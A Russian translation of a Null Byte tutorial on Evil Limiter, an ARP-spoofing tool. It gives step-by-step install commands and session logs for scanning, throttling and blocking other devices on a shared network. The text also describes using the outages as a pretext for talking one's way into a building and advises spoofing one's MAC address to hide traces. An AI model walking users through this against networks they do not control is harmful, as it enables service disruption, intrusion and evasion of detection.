Как контролировать сетевой трафик с помощью Evil Limiter, чтобы ограничить или отключить устройства

Если вы обнаружите, что ваш сосед по комнате использует ограниченную пропускную способность для видеоигр, или обнаружите, что сосед сам пригласил себя в вашу сеть Wi-Fi, вы можете легко вернуть себе контроль над доступом в Интернет. Evil Limiter делает это, позволяя вам контролировать скорость передачи данных любого устройства в той же сети, что и вы, позволяя вам полностью замедлить или даже полностью остановить скорость передачи данных для них.

Вообще говоря, средний пользователь не имеет особого представления о том, кто или что находится в его сети, поэтому любой, кто знает пароль, может проскользнуть и начать использовать пропускную способность. В других ситуациях сосед по комнате или член семьи может несправедливо использовать всю полосу пропускания, чтобы играть в видеоигры или транслировать видео. Некоторые маршрутизаторы имеют веб-интерфейсы, которые позволяют устанавливать ограничения для каждого подключения, но без пароля для маршрутизатора эта опция может быть недоступна.

Evil Limiter использует ARP-спуфинг, чтобы устройства отправляли данные на атакующий компьютер, а не на маршрутизатор, что позволяет нам отправлять данные на маршрутизатор с любой скоростью, которая нам нравится. Благодаря тому, как работает протокол ARP, можно контролировать скорость любого устройства в общем сетевом соединении. Однако, поскольку спуфинг ARP работает только в сетях IPv4, этот инструмент пока не будет работать в IPv6.

Злой ограничитель для хакеров

Для хакера Evil Limiter позволяет легко атаковать одно, несколько или все устройства в сети. В любой момент легко перерезать шнур в Интернете с того или иного устройства, что является удобным предлогом для атаки социальной инженерии. Если хакеру нужен доступ в зону, предназначенную только для сотрудников, он может идентифицировать устройства сотрудников в той зоне, в которой они хотят находиться, а затем ограничить скорость их соединения.

Вместо того, чтобы появляться без предупреждения, хакер может заблокировать соединение для передачи данных менеджера, притворившись, что звонит из коммунальной компании, чтобы спросить, медленное ли соединение с Интернетом. Когда менеджер обнаруживает, что Интернет действительно медленный, хакер просто спрашивает, когда лучше всего послать кого-нибудь, чтобы исправить это, давая им предлог для входа в здание и не позволяя жертве позвонить в реальную коммунальную компанию.

Что вам понадобится

Чтобы использовать Evil Limiter, вам понадобится система Linux, такая как Kali или Ubuntu с Python3 или выше. Хотя мощным преимуществом Evil Limter является то, что его можно запускать в сетях, даже если у вас нет прав администратора, я рекомендую убедиться, что у вас есть разрешение на запуск инструмента в любой сети, в которой вы хотите его протестировать.

Evil Limiter использует пакет ARP для ограничения скорости соединения, который присутствует в сетях IPv4, но не в сетях IPv6. По этой причине, как упоминалось ранее, системы IPv6 недоступны для этого инструмента.

Шаг 1. Установите Evil Limiter

Чтобы установить Evil Limiter, есть только несколько команд, которые можно запустить в окне терминала, как показано ниже. Когда необходимые библиотеки закончат установку, Evil Limiter должен быть установлен и готов к работе.

~# git clone https://github.com/bitbrute/evillimiter.git 
~# cd evillimiter 
~# sudo python3 setup.py install

Шаг 2: подключитесь к сети

Теперь вам нужно подключиться к целевой сети. После этого вы можете запустить Evil Limiter, набрав evillimiter в новом окне терминала. Вы должны увидеть что-то вроде того, что показано ниже.

Если вы видите это, Evil Limiter установлен, подключен к сети и готов к работе.

Шаг 3. Просмотр доступных команд

Вы можете изучить функциональные возможности Evil Limiter, просматривая систему меню и проверяя доступные команды. Для этого введите вопросительный знак в терминале, чтобы открыть страницу справки.

(Main) >>> ? 
scan scans for online hosts on your network. required to find the hosts you want to limit. 
hosts lists all scanned hosts. contains host information, including IDs. 
limit [ID1,ID2,...] [rate] limits bandwith of host(s) (uload/dload). e.g.: limit 4 100kbit limit 2,3,4 1gbit limit all 200kbit 
block [ID1,ID2,...] blocks internet access of host(s). e.g.: block 3,2 block all 
free [ID1,ID2,...] unlimits/unblocks host(s). e.g.: free 3 free all 
add [IP] (--mac [MAC]) adds custom host to host list. mac resolved automatically. e.g.: add 192.168.178.24 add 192.168.1.50 --mac 1c:fc:bc:2d:a6:37 
clear clears the terminal window.

Шаг 4. Обнаружение устройств

Как мы видим выше, команды просты. Чтобы найти устройства в сети, все, что вам нужно сделать, это ввести сканирование.

(Main) >>> scan 
100% |██████████████████████████████| 256/256 
OK 7 hosts discovered.

При сканировании будут обнаружены все остальные хосты в сети. Введите хосты, чтобы показать их все.

(Main) >>> hosts 
┌Hosts──────────────┬───────────────────┬──────────┬────────┐ 
│ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │ ├────┼──────────────┼───────────────────┼──────────┼────────┤ 
│ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │ 
│ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │ 
│ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │ 
│ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │ 
│ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │ 
│ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │ 
│ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │ └────┴──────────────┴───────────────────┴──────────┴────────┘

В моем примере в сети было обнаружено семь устройств, одно из которых - маршрутизатор. Теперь у нас есть целевой список, с помощью которого мы можем заблокировать или ограничить доступ, так что давайте попробуем.

Шаг 5. Ограничьте или заблокируйте устройства

Если вы хотите ограничить все устройства, кроме маршрутизатора, вы можете перечислить их одно за другим после команды limit. Вам также необходимо указать скорость, которой вы хотите их ограничить. В моем случае я выберу 200 кбит в качестве предельной скорости.

Вы можете использовать команду limit all, чтобы выбрать все, но поскольку вы хотите оставить маршрутизатор в покое, введите команду limit 1,2,3,4,5,6 вместо этого начать ограничивать эти конкретные устройства. Количество перечисленных устройств зависит от того, сколько вы нашли.

(Main) >>> limit 1,2,3,4,5,6 200kbit 
OK 192.168.5.2 limited to 200kbit. 
OK 192.168.5.4 limited to 200kbit. 
OK 192.168.5.24 limited to 200kbit. 
OK 192.168.5.25 limited to 200kbit. 
OK 192.168.5.61 limited to 200kbit. 
OK 192.168.5.67 limited to 200kbit.

Теперь, когда мы ограничили некоторые устройства, мы также можем выбрать любые устройства, которые мы хотим полностью заблокировать от доступа к сети. Я обнаружил, что иногда Evil Limiter может быть неуклюжим при ограничении соединений, и в результате устройства настолько ограничены, что могут быть заблокированы.

Чтобы заблокировать устройство, введите команду block, а затем номер любого устройства, которое вы хотите запретить получать данные по сети.

(Main) >>> block 3 
OK 192.168.5.24 blocked.

Попробуйте хосты второй раз. Большая часть сети должна быть заблокирована или ограничена.

(Main) >>> hosts ┌Hosts──────────────┬───────────────────┬──────────┬─────────┐ 
│ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status  │ ├────┼──────────────┼───────────────────┼──────────┼─────────┤ 
│ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free    │ 
│ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Limited │ 
│ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Limited │ 
│ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Blocked │ 
│ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Limited │ 
│ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Limited │ 
│ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Limited │ └────┴──────────────┴───────────────────┴──────────┴─────────┘

Шаг 6: восстановить нормальное соединение

Теперь, когда вы вызвали хаос в сети, пришло время вернуть все на круги своя. К счастью, сделать это легко. Вы можете восстановить устройства по одному или запустить бесплатно все, чтобы отменить любые ограничения для сетевых устройств.

(Main) >>> free all 
OK 192.168.5.2 freed. 
OK 192.168.5.4 freed. 
OK 192.168.5.24 freed. 
OK 192.168.5.25 freed. 
OK 192.168.5.61 freed. 
OK 192.168.5.67 freed.

Запустите хосты в третий раз, и доступ к сети снова станет нормальным для всех устройств.

(Main) >>> hosts ┌Hosts──────────────┬───────────────────┬──────────┬────────┐ 
│ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │ ├────┼──────────────┼───────────────────┼──────────┼────────┤ 
│ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │ 
│ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │ 
│ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │ 
│ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │ 
│ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │ 
│ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │ 
│ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │ └────┴──────────────┴───────────────────┴──────────┴────────┘

Злой ограничитель эффективен, но агрессивен

В своих тестах с Evil Limiter я обнаружил, что это чрезвычайно эффективный, хотя иногда и властный инструмент. Иногда мои попытки ограничить цель вместо этого полностью блокировали бы ее, поэтому обязательно проверьте эффективность этого инструмента, прежде чем использовать его где-нибудь в важном месте.

При использовании Evil Limiter следует иметь в виду, что спуфинг ARP раскрывает ваш MAC-адрес, поэтому использование этого инструмента в сети эффективно сообщает всем, что ваш MAC-адрес является маршрутизатором. В результате ваш MAC-адрес остается в кэше ARP каждой машины, на которую вы нацеливаетесь, поэтому обязательно подделайте свой MAC-адрес перед использованием этого инструмента, если вы не хотите оставлять отпечатки пальцев своей машины по всей сети.

Надеюсь, вам понравилось это руководство по использованию Evil Limiter! Если у вас есть какие-либо вопросы об этом руководстве по спуфингу ARP, оставьте комментарий ниже и не стесняйтесь связаться со мной в Twitter @KodyKinzie.

Не пропустите: Получите чей-либо пароль Wi-Fi без взлома с помощью Wifiphisher

Фото на обложке и скриншоты Kody / Null Byte

Первоначально опубликовано на https://null-byte.wonderhowto.com 24 мая 2019 г.